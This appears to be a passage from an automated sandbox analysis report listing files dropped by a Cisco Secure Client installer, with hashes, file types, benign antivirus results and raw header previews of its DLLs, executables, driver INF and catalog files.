                                                                                                                                                                                                  SHA1:3095A3A7866188806898F5A366E05C53C9AF9788
                                                                                                                                                                                                  SHA-256:557F2E566FCA90B4BF853F30130EDB15EE675B76B94377ECF81792EEAA3A2690
                                                                                                                                                                                                  SHA-512:13FBEA608AEDEC472419901B6B265608070E5ADBAACFBA71091680B86A4FE0F22564AB01C6DEB283CC501BBE96F12F9196798DF263FC60C828078C66B4D18FA3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............U...U...U...U..UQ.T..U..T..U..T..U..T..U..T..U..T..U..T..U...UM..U..T..U..T...U..zU...U...U...U..T...URich...U........PE..L...O..d...........!.........~.......j.......................................`............@A.........................................0..............."..hH...@..(...P...T...............................@............................................text.............................. ..`.rdata..dS.......T..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..(....@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):525928
                                                                                                                                                                                                  Entropy (8bit):6.663689707982956
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:8zNdH+68U6BXsQex0xCC5pQEhRL/21VVirhVVVPlLIOqyRcCGlhl48MBAuh:WNxQBXsQ0K5pXPLeriPlLIOqpdvlo
                                                                                                                                                                                                  MD5:4CE708F0420389B058B7F2D74561A2C3
                                                                                                                                                                                                  SHA1:9ABCCDEB744DFFD374DF72117CC47C7D18EEF506
                                                                                                                                                                                                  SHA-256:382B6CD7055A36DECCAD2839EC47BFD49B1C4077EE5DFC9CB07C829A4CAAABBE
                                                                                                                                                                                                  SHA-512:53A0BC22C6772CB46DBB1CBE6BE2079AB620845CD0CB49FB4AFE7D8DC861D38351A4CE7226ADCCE70180F65AB112701F55F91AA438B018D6C370A4244FB943ED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............f]..f]..f]...]..f]..]..f].b\..f].e\..f].g\..f].c\..f]p.g\..f].g\..f]..g\..f]..g]~.f]p.o\..f]p.f\..f]p..]..f]...]..f]p.d\..f]Rich..f]................PE..L......d...........!.........@......................................................N.....@A............................0............@...B..............hH......._...u..T...................@v......`u..@............................................text............................... ..`.rdata..............................@..@.data........ ......................@....rsrc....B...@...D..................@..@.reloc..._.......`...^..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):359016
                                                                                                                                                                                                  Entropy (8bit):6.617093568333673
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:qSg72Vz/I7DPaCd+syv/RDdb4UP1LdmBIuITM2CswQuY5LpwUm:qSg6VzWPaXsyv5NLdfn7Rm
                                                                                                                                                                                                  MD5:44DE330562CC79CCF0D73FA8B99D369C
                                                                                                                                                                                                  SHA1:B0256E51EC29F6E42A24FA12F23086E5CAC0B8D1
                                                                                                                                                                                                  SHA-256:53C2E4F4D092C14F418D619DCADBFA0A6ED589492844C2AB2EEE504061600429
                                                                                                                                                                                                  SHA-512:CE8439B558DF0E14B1DBEFD9D34DD089F3FDDA90B9409446228B6F47C5F68A75020C8822790ABF43E75EC8598AD35354877F169E58A775EE19E17693136D8634
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=...........................................V.................Q.....9..........Rich...........PE..L......d...........!................@X.......................................p......Z<....@A.........................`..\...\a.......................2..hH......,W......T...............................@............................................text.............................. ..`.rdata..............................@..@.data....-.......*..................@....rsrc...............................@..@.reloc..,W.......X..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1035368
                                                                                                                                                                                                  Entropy (8bit):6.730008187623686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:zx1d5ucCv/+XrPAQ/gL+EIK6bs6l7HNLM8RL45fvfmY3YrA0RFZa:z5iH+T/9y6I69HNLM8d45ZYrtRLa
                                                                                                                                                                                                  MD5:1987D72B9C16314FC1BDEC8315AA31B4
                                                                                                                                                                                                  SHA1:55BA31FA638F3EF505D450DAAFF5F2E6EFBB59A9
                                                                                                                                                                                                  SHA-256:CABF64B736A3217E51FE4F49DC164C2CB5218D03F05AE4B932C7D362AB5A2CFD
                                                                                                                                                                                                  SHA-512:417993511DFCACD266D459ED0B7204327D6B488F9A338C06090D81036D9B1A3D24F87E2251447F74CA655F5E234D57DF0685C45458FFDB47EB246B6E2E2E9692
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........|..|...|...|.......|.......|.......|.......|.......|..$....|.......|.......|.......|.......|...|......$....|..$....|..$...|...|...|..$....|..Rich.|..........PE..L...M..d...........!.................G....................................................@A............................\T..............................hH..............T...........................@...@............................................text...,........................... ..`.rdata..............................@..@.data....3.......0..................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):624232
                                                                                                                                                                                                  Entropy (8bit):6.548375643467659
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:XaEbYc+L1pQ1aE6Qo+gbEXefqR5nB3naFKMwKKbtxbZ6+XZdtbjmb2gOb/vBUbyk:XaEbYc+LUtB3ZssEiqYfQQEvFBEfI+Q
                                                                                                                                                                                                  MD5:1536EB035B356121711182E1A3413658
                                                                                                                                                                                                  SHA1:D188D4ABF1FFA6C7E577D9AD3FDCF1ED57C6BD85
                                                                                                                                                                                                  SHA-256:DD600CEDE829CFBE9E1B5B2F1B35219294654C19DC4E9E208CFCF6DF71F2B957
                                                                                                                                                                                                  SHA-512:049CA3075D2BE2E0DD3FFD59C5C7EE0A417D3565ED53E9E589CFF7E68AE8E34C91824A97EC6C1C6E0139D4DF485906632E066CC21805FBB299E3FBB1E11A568E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]..Q..~...~...~.......~.......~.K.z...~.K.}...~.K.....~......~...z...~.K.{.6.~.......~...~...~.....G.~..w...~......~.......~..|...~.Rich..~.........................PE..L......d.................0..........`$.......@....@..........................p......@b....@.................................`2..........pS...........>..hH.......Q......T..............................@............@..l............................text..../.......0.................. ..`.rdata..P....@.......4..............@..@.data....K...`...F...R..............@....rsrc...pS.......T..................@..@.reloc...Q.......R..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):556
                                                                                                                                                                                                  Entropy (8bit):4.645067217480077
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:VKYMF1IXH5EkqfXMF1ITOLKvXwCPijecTygdLe3f8ytWHtO+PGb:iF1a6AF1owBlPkNtWNa
                                                                                                                                                                                                  MD5:A54C8C0CFD88CFE16115DCFF322A637A
                                                                                                                                                                                                  SHA1:DFD99A331FE511542CEE60731DE1F603AB11C3AD
                                                                                                                                                                                                  SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                                                                                  SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):145512
                                                                                                                                                                                                  Entropy (8bit):6.622600549799495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:2lE8KKdwsPSfyPQ2TbpoEcRj+SOXzPsdGTE55vt67Ktb1sK8W77tHbloNeITqx/4:2q82KP9TbpoEI+Ew7Ktb1sKXblmeIkO
                                                                                                                                                                                                  MD5:E6FF7D48757F7470A8861AC3B3E159E6
                                                                                                                                                                                                  SHA1:3B2ED33F1025FB320D3C7D5699A941D94BBDC222
                                                                                                                                                                                                  SHA-256:74D0A04DED5E21F85BF32274823894AA5ACB9DDABE3D845F896E47521DEC2FE6
                                                                                                                                                                                                  SHA-512:312D1EDA0FAA80EC22AAD2CB660D611C1EE0207DCE84AB3A318B89CC7229993C518DDCE8B72D55A10FD85E392665394FAFEC6A320EFA84213A02360B49F8B1E1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.}.=.......!.......).......).......1.......)...9...(...-...H...............,...-.y.,.......,...Rich-...........PE..L......d............................ ........0....@..........................@.......d....@.................................0...,.......................hH... .......c..T...................@e......Pd..@............0...............................text............................... ..`.rdata......0......................@..@.data... +..........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10484
                                                                                                                                                                                                  Entropy (8bit):7.081965462144553
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Xr1RLG32vJCEvyyKwnsFWQFl2j21EhqnajKs8E:lvrnsFR72qslGs8E
                                                                                                                                                                                                  MD5:38B464383C531FF40AD2538CF4442C25
                                                                                                                                                                                                  SHA1:899E6C26E8362C3811189977640D5B625B566CD9
                                                                                                                                                                                                  SHA-256:C130160691DA77B3AFD58E642A09439709C6B60729E6CFB06EE687A02B7E2A68
                                                                                                                                                                                                  SHA-512:407AD6D59035AC10A6CBEB368F72772A6CDBB889934BA4097046BD489CA5E36D4374E5C6655485AB28419D0EB45587C664E65113589E6131FB208D7ABDB4F885
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:0.(...*.H........(.0.(....1.0...`.H.e......0.....+.....7......0...0...+.....7......>.O.>I.......f..220217132307Z0...+.....7.....0...0....R4.4.2.B.1.1.8.F.3.7.D.A.5.5.C.9.2.3.A.D.2.E.4.9.7.C.F.2.B.2.6.E.2.9.5.0.2.F.4.D...1..A0>..+.....7...100....F.i.l.e........v.p.n.v.a.6.4.-.6...s.y.s...0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...1.,.2.:.6...3.,.2.:.1.0...0...0M..+.....7...1?0=0...+.....7...0...........0!0...+........D+..7.U.#..I|.n)P/M0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R8.4.B.B.1.C.E.C.D.D.3.8.F.D.2.0.3.D.2.E.E.9.6.9.1.9.0.2.C.3.F.C.C.B.D.E.D.3.6.6...1..50:..+.....7...1,0*...F.i.l.e........v.p.n.v.a.-.6...i.n.f...0E..+.....7...17050...+.....7.......0!0...+.............8. =..i.......f0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...1.,.2.:.6...3.,.2.:.1.0...0...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RB.B.A.C.C.3.7.6.5.1.5.D.4.1.0.F.C.4.9.7.C.A.B.1
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):166264
                                                                                                                                                                                                  Entropy (8bit):6.800892494270331
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:UZqJu0h1iCPZYtIzss2wizpHB7RoSxvQ02bnt56CY2G1zVSdqXCvjC:UZqU0hStIzrQqht567ZSY+jC
                                                                                                                                                                                                  MD5:06DEEA1786C951D3CC7E24A3E714FF03
                                                                                                                                                                                                  SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                                                                                                                                                                                                  SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                                                                                                                                                                                                  SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%>..a_a.a_a.a_a../`.c_a.h'.m_a.3*e.j_a.3*b.c_a.a_`.._a.3*`.d_a.3*d.r_a.3*a.`_a.3*..`_a.3*c.`_a.Richa_a.................PE..L...J|.a.........."!.....*...<......0........@......................................:.....@A.........................3..@....Q.......`...............f..x#...p..X....\..8............................\..@............P...............................text....).......*.................. ..`.data...(....@......................@....idata..`....P.......6..............@..@.rsrc........`.......D..............@..@.reloc..X....p.......H..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):660072
                                                                                                                                                                                                  Entropy (8bit):6.659866758160457
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:kSCossJt+kPCULOLT5xylm6hSCX+JGvP755x+RpUG1m3A0KmklXz0OH9IYW4U+1M:kbAJDOLT5po+kPARgA0KmuXz0OH9H3Ov
                                                                                                                                                                                                  MD5:5E4035EF3C0EEC7E49035F5DCD6054FF
                                                                                                                                                                                                  SHA1:633A4E83FF976CF041B65B7B6B1B54C697DAB0F5
                                                                                                                                                                                                  SHA-256:31F4F3D3A3F1E1761417FD9792B4151CD8C2724F2B83AD2C51C3E9A0D4D19BE4
                                                                                                                                                                                                  SHA-512:A0BA4A69A7D0EEDACC1F25361A69CA7D73CFC893632C1033858ED08BA2DEEED00592972BCB1FF6D075AFE5E8B64291F47A3E0FF6346CC3228A6C989DF10D857E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Rj...............sQ.....D~......D~......D~......D~.......~......b..<....`......C~..............~..-....~.......~=.......U......~......Rich....................PE..L......d...........!......................................................................@A............................<...,...T....p..................hH......L{...z..T...................@|......H{..@...............0............................text............................... ..`.rdata...K.......L..................@..@.data...@....P.......<..............@....rsrc........p.......F..............@..@.reloc..L{.......|...N..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42600
                                                                                                                                                                                                  Entropy (8bit):6.850341851307747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                                                                                  MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                                                                                  SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                                                                                  SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                                                                                  SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.X.^h..^h..^h..&...^h..+l..^h..+k..^h..+m..^h..+i..^h..+i..^h..5i..^h..^i..^h..+a..^h..+...^h..^...^h..+j..^h.Rich.^h.................PE..L...K..d.................4...*......p .......P....@.......................................@.................................8].......................^..hH..........LU..T............................U..@............P..,............................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data...L....p.......P..............@....rsrc................R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2392680
                                                                                                                                                                                                  Entropy (8bit):6.658300142387931
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:dFtYsvJwGcAhLrE0o5r+1mP/4qkxhDzMkfUg8Ul6:dFTNrEvmDzMkfP85
                                                                                                                                                                                                  MD5:208BC604DF1E3C9FF524C9AD9066E552
                                                                                                                                                                                                  SHA1:DC76F03E1A6851A8610FCA6A73EFCA567ADA84CB
                                                                                                                                                                                                  SHA-256:025635A4E805DA1241F752FE664C766B745C7F70DE070DC4AC87875D249150C5
                                                                                                                                                                                                  SHA-512:4A95407898D6EA16ED96208B9B94825091CA9E554A278654D71009AE04C695FEF3745BA3FF2DFFD5FF1C76DC62C58522300F0FD903F52F0A3E4F68DA5CE23892
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......t..0...0...0...9.w.$.......8...b...4...b...:...b...9...$...2.......2...b...,...e...4...$...-...0.......$...1..............1.......1...0.s.1.......1...Rich0...........PE..L.....d...........!.........d................................................$.......$...@A........................pm..D1....!......."..B...........:$.hH...."......D..T...................@E......`D..@............................................text...Z........................... ..`.rdata..............................@..@.data.........!.......!.............@....rsrc....B...."..D...n".............@..@.reloc........".......".............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):436600
                                                                                                                                                                                                  Entropy (8bit):6.647435576141042
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:/gO0BGzePo6+J+4P0xYv7IQgnhUgiW6QR7t5s03Ooc8dHkC2esKcWKe0:701Po6+J+dxYv7IQgk03Ooc8dHkC2ezc
                                                                                                                                                                                                  MD5:8FF1898897F3F4391803C7253366A87B
                                                                                                                                                                                                  SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                                                                                                                                                                                                  SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                                                                                                                                                                                                  SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...>|.a.........."!.........~...............0............................................@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89192
                                                                                                                                                                                                  Entropy (8bit):7.008180217438666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                                                                                  MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                                                                                  SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                                                                                  SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                                                                                  SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)...)...)... .!.#...{..*...O.O.-...{.."...{..#...{..(...=...+...)..........&......(.....M.(...).%.(......(...Rich)...................PE..L......d...........!.........b...............................................P......2q....@A........................@...`............0..X...............hH...@......T...T...............................@............................................text...f........................... ..`.rdata..nQ.......R..................@..@.data........ ......................@....rsrc...X....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                  Entropy (8bit):5.184476593945747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                                                                                  MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                                                                                  SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                                                                                  SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                                                                                  SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):411752
                                                                                                                                                                                                  Entropy (8bit):6.881611330499658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                                                                                  MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                                                                                  SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                                                                                  SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                                                                                  SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9:.3}[.`}[.`}[.`t#x`s[.`/..a.[.`/..aq[.`/..aw[.`/..ax[.`i0.a{[.`(..a~[.`}[.`.[.`}[.`p[.`(..a.[.`(..a|[.`(..a|[.`Rich}[.`................PE..L.....Od...........!................ ........................................P............@A............................x...X...........................hH... ...#......T...............................@............................................text....}.......~.................. ..`fipstx...n.......p.................. ..`.rdata...(.......*..................@..@.data........0......................@...fipsro..`]...P...^... ..............@..@fipsda...............~..............@...fsig................................@..@fipsrd...M.......N..................@..@.reloc...#... ...$..................@..B................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):436600
                                                                                                                                                                                                  Entropy (8bit):6.647435576141042
                                                                                                                                                                                                  Encrypted:false
